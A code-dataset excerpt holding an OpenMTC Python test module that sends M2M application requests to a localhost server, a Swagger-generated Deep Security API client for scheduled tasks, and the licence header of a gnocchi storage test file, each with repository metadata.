eds/openmtc-gevent/server/openmtc-server/src/openmtc_server/plugins/transport_android_intent/test_retarget.py
|
piyush82/elastest-device-emulator-service
|
b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7
|
[
"Apache-2.0"
] | null | null | null |
eds/openmtc-gevent/server/openmtc-server/src/openmtc_server/plugins/transport_android_intent/test_retarget.py
|
piyush82/elastest-device-emulator-service
|
b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7
|
[
"Apache-2.0"
] | null | null | null |
eds/openmtc-gevent/server/openmtc-server/src/openmtc_server/plugins/transport_android_intent/test_retarget.py
|
piyush82/elastest-device-emulator-service
|
b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7
|
[
"Apache-2.0"
] | null | null | null |
from openmtc_scl.serializer import JsonSerializer
from IntentHandling import IntentHandler
from openmtc.response import RetrieveResponseConfirmation, CreateResponseConfirmation, DeleteResponseConfirmation, ErrorResponseConfirmation
retargeturl = "http://localhost:6001"
def test_retarget(request_handler, logger, config, method, path):
payload = {"method":method,
"path":retargeturl+path,
"replyAction":"intent://test_action",
"requestId":"123"
}
intentHandler = IntentHandler(logger, config)
request = intentHandler.parseRequest("test_issuer",payload, None)
result = intentHandler.handleParsedRequest(request, request_handler, None)
# result = json.loads(result.decode("utf-8"))
logger.info("result is "+str(result))
#f result is not None:
# if isinstance(result[1], IntentError):
# logger.info("error while sending request")
# #result.sendIntent(context, self.action, self.issuer)
# elif isinstance(result[1], Response):
# logger.info("hurray"+str(result["response"]))
def test_create_app(request_handler, logger, config, app_name):
payload = {"method":"create",
"content_type":"application/json",
"path":retargeturl+"/m2m/applications",
"content":"{\"application\":{\"appId\":\""+app_name+"\"}}",
"replyAction":"intent://test_action",
"requestId":"123"
}
# reference = "someRef"
# subscriptionId = "someSubscrId"
intentHandler = IntentHandler(logger, config)
request = intentHandler.parseRequest("test_issuer",payload, None)
result = intentHandler.handleParsedRequest(request, request_handler, None)
logger.info("result is "+str(result))
def test_create_app_with_search_str(request_handler, logger, config, app_name, search_string):
if search_string is None:
test_create_app(request_handler, logger, config, app_name)
else:
payload = {"method":"create",
"content_type":"application/json",
"path":retargeturl+"/m2m/applications",
"content":"{\"application\":{\"appId\":\""+app_name+"\", \"searchStrings\":{\"searchString\":[\""+search_string+"\"]}}}",
"replyAction":"intent://test_action",
"requestId":"123"
}
# reference = "someRef"
# subscriptionId = "someSubscrId"
intentHandler = IntentHandler(logger, config)
request = intentHandler.parseRequest("test_issuer",payload, None)
result = intentHandler.handleParsedRequest(request, request_handler, None)
logger.info("result is "+str(result))
def test_create_app_property(request_handler, logger, config, app_name, prop_name):
payload = {"method":"create",
"content_type":"application/json",
"path":retargeturl+"/m2m/applications/"+app_name+"/containers",
"content":"{\"container\":{\"id\":\""+prop_name+"\"}}",
"replyAction":"intent://test_action",
"requestId":"123"
}
# reference = "someRef"
# subscriptionId = "someSubscrId"
intentHandler = IntentHandler(logger, config)
request = intentHandler.parseRequest("test_issuer",payload, None)
result = intentHandler.handleParsedRequest(request, request_handler, None)
logger.info("result is "+str(result))
def test_get_latest_data_of_property(request_handler, logger, config, app_name, prop_name):
payload = {"method":"retrieve",
"content_type":"application/json",
"path":retargeturl+"/m2m/applications/"+app_name+"/containers/"+prop_name+"/contentInstances/latest",
"replyAction":"intent://test_action",
"requestId":"123"
}
# reference = "someRef"
# subscriptionId = "someSubscrId"
intentHandler = IntentHandler(logger, config)
request = intentHandler.parseRequest("test_issuer",payload, None)
result = intentHandler.handleParsedRequest(request, request_handler, None)
logger.info("result is "+str(result))
response = result["response"]
if isinstance(response, RetrieveResponseConfirmation):
if response.resource is not None:
serializer = JsonSerializer()
content = serializer.encode(response.resource)
logger.info("response content is "+content)
def test_get_all_properties(request_handler, logger, config, app_name):
payload = {"method":"retrieve",
"content_type":"application/json",
"path":retargeturl+"/m2m/applications/"+app_name+"/containers",
"replyAction":"intent://test_action",
"requestId":"123"
}
# reference = "someRef"
# subscriptionId = "someSubscrId"
intentHandler = IntentHandler(logger, config)
request = intentHandler.parseRequest("test_issuer",payload, None)
result = intentHandler.handleParsedRequest(request, request_handler, None)
logger.info("result is "+str(result))
response = result["response"]
if isinstance(response, RetrieveResponseConfirmation):
if response.resource is not None:
serializer = JsonSerializer()
content = serializer.encode(response.resource)
logger.info("response content is "+content)
def test_subscribe_apps_with_search_str(request_handler, logger, config, search_string, contact):
content = "{\"subscription\":{\"contact\":\""+contact+"\""
if search_string is not None:
content = content+", \"filterCriteria\":{\"searchStrings\":{\"searchString\":[\""+search_string+"\"] }}"
content = content+ "}}"
logger.info("content is "+content)
payload = {"method":"create",
"path":retargeturl+"/m2m/applications/subscriptions",
"replyAction":contact,
"requestId":"123",
"content_type":"application/json",
"content":content
}
intentHandler = IntentHandler(logger, config)
request = intentHandler.parseRequest("test_issuer",payload, None)
result = intentHandler.handleParsedRequest(request, request_handler, None)
logger.info("result is "+str(result))
'''
def update_subscription
def test_unsubscribe_apps_with_search_str(request_handler, logger, config, search_string, contact):
'''
def test_discover_apps_with_search_str(request_handler, logger, config, search_string, contact):
payload = {"method":"retrieve",
"path":retargeturl+"/m2m/discovery?searchStrings=\""+search_string+"\"",
"replyAction":contact,
"requestId":"123"
}
# reference = "someRef"
# subscriptionId = "someSubscrId"
intentHandler = IntentHandler(logger, config)
request = intentHandler.parseRequest("test_issuer",payload, None)
result = intentHandler.handleParsedRequest(request, request_handler, None)
logger.info("result is "+str(result))
def test_get_app(request_handler, logger, config, app_name, contact):
payload = {"method":"retrieve",
"path":retargeturl+"/m2m/applications/"+app_name,
"replyAction":contact,
"requestId":"123"
}
# reference = "someRef"
# subscriptionId = "someSubscrId"
intentHandler = IntentHandler(logger, config)
request = intentHandler.parseRequest("test_issuer",payload, None)
result = intentHandler.handleParsedRequest(request, request_handler, None)
logger.info("result is "+str(result))
def test_subscribe_pushed_data(request_handler, logger, config, app_name, property_name, contact):
payload = {"method":"create",
"content_type":"application/json",
"path":retargeturl+"/m2m/applications/"+app_name+"/containers/"+property_name+"/contentInstances/subscriptions",
"content":"{\"subscription\":{\"contact\":\""+contact+"\"}}",
"replyAction":"intent://test_action",
"requestId":"123"
}
# reference = "someRef"
# subscriptionId = "someSubscrId"
intentHandler = IntentHandler(logger, config)
request = intentHandler.parseRequest("test_issuer",payload, None)
result = intentHandler.handleParsedRequest(request, request_handler, None)
logger.info("result is "+str(result))
def test_push_data(request_handler, logger, config, app_name, property_name):
payload = {"method":"create",
"content_type":"application/json",
"path":retargeturl+"/m2m/applications/"+app_name+"/containers/"+property_name+"/contentInstances",
"content":"{\"value\":\"75\"}",
"replyAction":"intent://test_action",
"requestId":"123"
}
# reference = "someRef"
# subscriptionId = "someSubscrId"
intentHandler = IntentHandler(logger, config)
request = intentHandler.parseRequest("test_issuer",payload, None)
result = intentHandler.handleParsedRequest(request, request_handler, None)
logger.info("result is "+str(result))
def test_destroy_app(request_handler, logger, config, app_name):
payload = {"method":"delete",
"content_type":"application/json",
"path":retargeturl+"/m2m/applications/"+app_name,
"replyAction":"intent://test_action",
"requestId":"123"
}
# reference = "someRef"
# subscriptionId = "someSubscrId"
intentHandler = IntentHandler(logger, config)
request = intentHandler.parseRequest("test_issuer",payload, None)
result = intentHandler.handleParsedRequest(request, request_handler, None)
logger.info("result is "+str(result))
| 43.73991
| 140
| 0.650502
| 894
| 9,754
| 6.941834
| 0.121924
| 0.058653
| 0.045118
| 0.058653
| 0.808895
| 0.808895
| 0.797132
| 0.768289
| 0.763616
| 0.726394
| 0
| 0.007298
| 0.213348
| 9,754
| 222
| 141
| 43.936937
| 0.801512
| 0.093705
| 0
| 0.679245
| 0
| 0
| 0.20816
| 0.01337
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.018868
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9625605efffd855b2f0477ab2c11c62dce89e2cb
| 30,624
|
py
|
Python
|
source/deepsecurity/api/scheduled_tasks_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-10-30T16:40:09.000Z
|
2021-10-30T16:40:09.000Z
|
source/deepsecurity/api/scheduled_tasks_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-07-28T20:19:03.000Z
|
2021-07-28T20:19:03.000Z
|
source/deepsecurity/api/scheduled_tasks_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-10-30T16:40:02.000Z
|
2021-10-30T16:40:02.000Z
|
# coding: utf-8
"""
Trend Micro Deep Security API
Copyright 2018 - 2020 Trend Micro Incorporated.<br/>Get protected, stay secured, and keep informed with Trend Micro Deep Security's new RESTful API. Access system data and manage security configurations to automate your security workflows and integrate Deep Security into your CI/CD pipeline. # noqa: E501
OpenAPI spec version: 12.5.841
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from deepsecurity.api_client import ApiClient
class ScheduledTasksApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_scheduled_task(self, scheduled_task, api_version, **kwargs): # noqa: E501
"""Create a Scheduled Task # noqa: E501
Create a new scheduled task. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_scheduled_task(scheduled_task, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ScheduledTask scheduled_task: The settings of the new scheduled task. (required)
:param str api_version: The version of the api being called. (required)
:return: ScheduledTask
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_scheduled_task_with_http_info(scheduled_task, api_version, **kwargs) # noqa: E501
else:
(data) = self.create_scheduled_task_with_http_info(scheduled_task, api_version, **kwargs) # noqa: E501
return data
def create_scheduled_task_with_http_info(self, scheduled_task, api_version, **kwargs): # noqa: E501
"""Create a Scheduled Task # noqa: E501
Create a new scheduled task. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_scheduled_task_with_http_info(scheduled_task, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ScheduledTask scheduled_task: The settings of the new scheduled task. (required)
:param str api_version: The version of the api being called. (required)
:return: ScheduledTask
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['scheduled_task', 'api_version'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_scheduled_task" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'scheduled_task' is set
if ('scheduled_task' not in params or
params['scheduled_task'] is None):
raise ValueError("Missing the required parameter `scheduled_task` when calling `create_scheduled_task`") # noqa: E501
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `create_scheduled_task`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'scheduled_task' in params:
body_params = params['scheduled_task']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/scheduledtasks', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ScheduledTask', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_scheduled_task(self, scheduled_task_id, api_version, **kwargs): # noqa: E501
"""Delete a Scheduled Task # noqa: E501
Delete a scheduled task by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_scheduled_task(scheduled_task_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int scheduled_task_id: The ID number of the scheduled task to delete. (required)
:param str api_version: The version of the api being called. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_scheduled_task_with_http_info(scheduled_task_id, api_version, **kwargs) # noqa: E501
else:
(data) = self.delete_scheduled_task_with_http_info(scheduled_task_id, api_version, **kwargs) # noqa: E501
return data
def delete_scheduled_task_with_http_info(self, scheduled_task_id, api_version, **kwargs): # noqa: E501
"""Delete a Scheduled Task # noqa: E501
Delete a scheduled task by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_scheduled_task_with_http_info(scheduled_task_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int scheduled_task_id: The ID number of the scheduled task to delete. (required)
:param str api_version: The version of the api being called. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['scheduled_task_id', 'api_version'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_scheduled_task" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'scheduled_task_id' is set
if ('scheduled_task_id' not in params or
params['scheduled_task_id'] is None):
raise ValueError("Missing the required parameter `scheduled_task_id` when calling `delete_scheduled_task`") # noqa: E501
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `delete_scheduled_task`") # noqa: E501
if 'scheduled_task_id' in params and not re.search('\\d+', str(params['scheduled_task_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `scheduled_task_id` when calling `delete_scheduled_task`, must conform to the pattern `/\\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scheduled_task_id' in params:
path_params['scheduledTaskID'] = params['scheduled_task_id'] # noqa: E501
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/scheduledtasks/{scheduledTaskID}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def describe_scheduled_task(self, scheduled_task_id, api_version, **kwargs): # noqa: E501
"""Describe a Scheduled Task # noqa: E501
Describe a scheduled task by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.describe_scheduled_task(scheduled_task_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int scheduled_task_id: The ID number of the scheduled task to describe. (required)
:param str api_version: The version of the api being called. (required)
:return: ScheduledTask
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.describe_scheduled_task_with_http_info(scheduled_task_id, api_version, **kwargs) # noqa: E501
else:
(data) = self.describe_scheduled_task_with_http_info(scheduled_task_id, api_version, **kwargs) # noqa: E501
return data
def describe_scheduled_task_with_http_info(self, scheduled_task_id, api_version, **kwargs): # noqa: E501
"""Describe a Scheduled Task # noqa: E501
Describe a scheduled task by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.describe_scheduled_task_with_http_info(scheduled_task_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int scheduled_task_id: The ID number of the scheduled task to describe. (required)
:param str api_version: The version of the api being called. (required)
:return: ScheduledTask
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['scheduled_task_id', 'api_version'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method describe_scheduled_task" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'scheduled_task_id' is set
if ('scheduled_task_id' not in params or
params['scheduled_task_id'] is None):
raise ValueError("Missing the required parameter `scheduled_task_id` when calling `describe_scheduled_task`") # noqa: E501
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `describe_scheduled_task`") # noqa: E501
if 'scheduled_task_id' in params and not re.search('\\d+', str(params['scheduled_task_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `scheduled_task_id` when calling `describe_scheduled_task`, must conform to the pattern `/\\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scheduled_task_id' in params:
path_params['scheduledTaskID'] = params['scheduled_task_id'] # noqa: E501
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/scheduledtasks/{scheduledTaskID}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ScheduledTask', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_scheduled_tasks(self, api_version, **kwargs): # noqa: E501
"""List Scheduled Tasks # noqa: E501
Lists all scheduled tasks. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_scheduled_tasks(api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_version: The version of the api being called. (required)
:return: ScheduledTasks
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_scheduled_tasks_with_http_info(api_version, **kwargs) # noqa: E501
else:
(data) = self.list_scheduled_tasks_with_http_info(api_version, **kwargs) # noqa: E501
return data
def list_scheduled_tasks_with_http_info(self, api_version, **kwargs): # noqa: E501
"""List Scheduled Tasks # noqa: E501
Lists all scheduled tasks. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_scheduled_tasks_with_http_info(api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_version: The version of the api being called. (required)
:return: ScheduledTasks
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_version'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_scheduled_tasks" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `list_scheduled_tasks`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/scheduledtasks', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ScheduledTasks', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def modify_scheduled_task(self, scheduled_task_id, scheduled_task, api_version, **kwargs): # noqa: E501
"""Modify a Scheduled Task # noqa: E501
Modify a scheduled task by ID. Any unset elements will be left unchanged. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.modify_scheduled_task(scheduled_task_id, scheduled_task, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int scheduled_task_id: The ID number of the scheduled task to modify. (required)
:param ScheduledTask scheduled_task: The settings of the scheduled task to modify. (required)
:param str api_version: The version of the api being called. (required)
:return: ScheduledTask
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.modify_scheduled_task_with_http_info(scheduled_task_id, scheduled_task, api_version, **kwargs) # noqa: E501
else:
(data) = self.modify_scheduled_task_with_http_info(scheduled_task_id, scheduled_task, api_version, **kwargs) # noqa: E501
return data
def modify_scheduled_task_with_http_info(self, scheduled_task_id, scheduled_task, api_version, **kwargs): # noqa: E501
"""Modify a Scheduled Task # noqa: E501
Modify a scheduled task by ID. Any unset elements will be left unchanged. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.modify_scheduled_task_with_http_info(scheduled_task_id, scheduled_task, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int scheduled_task_id: The ID number of the scheduled task to modify. (required)
:param ScheduledTask scheduled_task: The settings of the scheduled task to modify. (required)
:param str api_version: The version of the api being called. (required)
:return: ScheduledTask
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['scheduled_task_id', 'scheduled_task', 'api_version'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method modify_scheduled_task" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'scheduled_task_id' is set
if ('scheduled_task_id' not in params or
params['scheduled_task_id'] is None):
raise ValueError("Missing the required parameter `scheduled_task_id` when calling `modify_scheduled_task`") # noqa: E501
# verify the required parameter 'scheduled_task' is set
if ('scheduled_task' not in params or
params['scheduled_task'] is None):
raise ValueError("Missing the required parameter `scheduled_task` when calling `modify_scheduled_task`") # noqa: E501
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `modify_scheduled_task`") # noqa: E501
if 'scheduled_task_id' in params and not re.search('\\d+', str(params['scheduled_task_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `scheduled_task_id` when calling `modify_scheduled_task`, must conform to the pattern `/\\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scheduled_task_id' in params:
path_params['scheduledTaskID'] = params['scheduled_task_id'] # noqa: E501
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'scheduled_task' in params:
body_params = params['scheduled_task']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/scheduledtasks/{scheduledTaskID}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ScheduledTask', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def search_scheduled_tasks(self, api_version, **kwargs): # noqa: E501
"""Search Scheduled Tasks # noqa: E501
Search for scheduled tasks using optional filters. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_scheduled_tasks(api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_version: The version of the api being called. (required)
:param SearchFilter search_filter: A collection of options used to filter the search results.
:return: ScheduledTasks
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.search_scheduled_tasks_with_http_info(api_version, **kwargs) # noqa: E501
else:
(data) = self.search_scheduled_tasks_with_http_info(api_version, **kwargs) # noqa: E501
return data
def search_scheduled_tasks_with_http_info(self, api_version, **kwargs): # noqa: E501
"""Search Scheduled Tasks # noqa: E501
Search for scheduled tasks using optional filters. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_scheduled_tasks_with_http_info(api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_version: The version of the api being called. (required)
:param SearchFilter search_filter: A collection of options used to filter the search results.
:return: ScheduledTasks
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_version', 'search_filter'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method search_scheduled_tasks" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `search_scheduled_tasks`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'search_filter' in params:
body_params = params['search_filter']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/scheduledtasks/search', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ScheduledTasks', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 45.10162
| 311
| 0.621833
| 3,531
| 30,624
| 5.136505
| 0.058907
| 0.107515
| 0.04466
| 0.026465
| 0.957104
| 0.954513
| 0.951811
| 0.94514
| 0.942218
| 0.938965
| 0
| 0.016329
| 0.294083
| 30,624
| 678
| 312
| 45.168142
| 0.822648
| 0.330623
| 0
| 0.803279
| 0
| 0
| 0.23793
| 0.058696
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035519
| false
| 0
| 0.010929
| 0
| 0.098361
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d6846c30ed920c7c807ab14b12bc875543791a3
| 54,968
|
py
|
Python
|
gnocchi/tests/test_storage.py
|
yi-cloud/gnocchi
|
72286fefdedef71a37104f7a535e4ed2b3a99f15
|
[
"Apache-2.0"
] | null | null | null |
gnocchi/tests/test_storage.py
|
yi-cloud/gnocchi
|
72286fefdedef71a37104f7a535e4ed2b3a99f15
|
[
"Apache-2.0"
] | null | null | null |
gnocchi/tests/test_storage.py
|
yi-cloud/gnocchi
|
72286fefdedef71a37104f7a535e4ed2b3a99f15
|
[
"Apache-2.0"
] | null | null | null |
# -*- encoding: utf-8 -*-
#
# Copyright © 2014-2015 eNovance
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
